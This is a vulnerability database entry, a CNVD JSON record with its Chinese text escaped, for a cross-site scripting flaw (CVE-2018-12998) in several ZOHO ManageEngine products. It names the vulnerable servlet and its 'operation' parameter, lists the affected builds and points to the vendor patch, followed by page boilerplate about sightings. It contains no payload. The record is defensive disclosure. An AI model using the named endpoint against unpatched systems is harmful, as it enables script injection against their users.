  "description": "ZOHO ManageEngine Netflow Analyzer\u7b49\u90fd\u662f\u7f8e\u56fd\u5353\u8c6a\uff08ZOHO\uff09\u516c\u53f8\u7684\u4ea7\u54c1\u3002ZOHO ManageEngine Netflow Analyzer\u662f\u4e00\u5957\u57fa\u4e8eWeb\u7684\u5e26\u5bbd\u76d1\u63a7\u5de5\u5177\u3002Network Configuration Manager\u662f\u4e00\u5957\u7528\u4e8e\u914d\u7f6e\u4ea4\u6362\u673a\u3001\u8def\u7531\u5668\u3001\u9632\u706b\u5899\u548c\u5176\u4ed6\u7f51\u7edc\u8bbe\u5907\u7684\u7f51\u7edc\u914d\u7f6e\u7ba1\u7406\u3001\u7f51\u7edc\u53d8\u66f4\u548c\u914d\u7f6e\u7ba1\u7406\uff08NCCM\uff09\u8f6f\u4ef6\u3002\r\n\r\n\u591a\u6b3eZOHO\u4ea7\u54c1\u4e2d\u5b58\u5728\u8de8\u7ad9\u811a\u672c\u6f0f\u6d1e\u3002\u8fdc\u7a0b\u653b\u51fb\u8005\u53ef\u901a\u8fc7\u5411/servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet URL\u53d1\u9001\u2018operation\u2019\u53c2\u6570\u5229\u7528\u8be5\u6f0f\u6d1e\u6ce8\u5165\u4efb\u610f\u7684Web\u811a\u672c\u6216HTML\u3002",
  "discovererName": "Xiaotian Wang",
  "formalWay": "\u76ee\u524d\u5382\u5546\u5df2\u53d1\u5e03\u5347\u7ea7\u8865\u4e01\u4ee5\u4fee\u590d\u6f0f\u6d1e\uff0c\u8be6\u60c5\u8bf7\u5173\u6ce8\u5382\u5546\u4e3b\u9875\uff1a\r\nhttps://www.manageengine.com/",
  "isEvent": "\u901a\u7528\u8f6f\u786c\u4ef6\u6f0f\u6d1e",
  "number": "CNVD-2018-17621",
  "openTime": "2018-09-05",
  "patchDescription": "ZOHO ManageEngine Netflow Analyzer\u7b49\u90fd\u662f\u7f8e\u56fd\u5353\u8c6a\uff08ZOHO\uff09\u516c\u53f8\u7684\u4ea7\u54c1\u3002ZOHO ManageEngine Netflow Analyzer\u662f\u4e00\u5957\u57fa\u4e8eWeb\u7684\u5e26\u5bbd\u76d1\u63a7\u5de5\u5177\u3002Network Configuration Manager\u662f\u4e00\u5957\u7528\u4e8e\u914d\u7f6e\u4ea4\u6362\u673a\u3001\u8def\u7531\u5668\u3001\u9632\u706b\u5899\u548c\u5176\u4ed6\u7f51\u7edc\u8bbe\u5907\u7684\u7f51\u7edc\u914d\u7f6e\u7ba1\u7406\u3001\u7f51\u7edc\u53d8\u66f4\u548c\u914d\u7f6e\u7ba1\u7406\uff08NCCM\uff09\u8f6f\u4ef6\u3002\r\n\r\n\u591a\u6b3eZOHO\u4ea7\u54c1\u4e2d\u5b58\u5728\u8de8\u7ad9\u811a\u672c\u6f0f\u6d1e\u3002\u8fdc\u7a0b\u653b\u51fb\u8005\u53ef\u901a\u8fc7\u5411/servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet URL\u53d1\u9001\u2018operation\u2019\u53c2\u6570\u5229\u7528\u8be5\u6f0f\u6d1e\u6ce8\u5165\u4efb\u610f\u7684Web\u811a\u672c\u6216HTML\u3002\u76ee\u524d\uff0c\u4f9b\u5e94\u5546\u53d1\u5e03\u4e86\u5b89\u5168\u516c\u544a\u53ca\u76f8\u5173\u8865\u4e01\u4fe1\u606f\uff0c\u4fee\u590d\u4e86\u6b64\u6f0f\u6d1e\u3002",
  "patchName": "\u591a\u6b3eZOHO\u4ea7\u54c1\u8de8\u7ad9\u811a\u672c\u6f0f\u6d1e\u7684\u8865\u4e01",
  "products": {
    "product": [
      "ZOHO ManageEngine Netflow Analyzer \u003cbuild 123137",
      "ZOHO ManageEngine Network Configuration Manager \u003cbuild 123128",
      "ZOHO ManageEngine OpManager \u003cbuild 123148",
      "ZOHO ManageEngine OpUtils \u003cbuild 123161"
    ]
  },
  "referenceLink": "https://nvd.nist.gov/vuln/detail/CVE-2018-12998",
  "serverity": "\u4e2d",
  "submitTime": "2018-07-03",
  "title": "\u591a\u6b3eZOHO\u4ea7\u54c1\u8de8\u7ad9\u811a\u672c\u6f0f\u6d1e"
}

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2018-12998 (GCVE-0-2018-12998)

VAR-201806-1164

FKIE_CVE-2018-12998

GHSA-2PW8-R6J9-6VM6

GSD-2018-12998

CNVD-2018-17621

Tags

Sightings

Nomenclature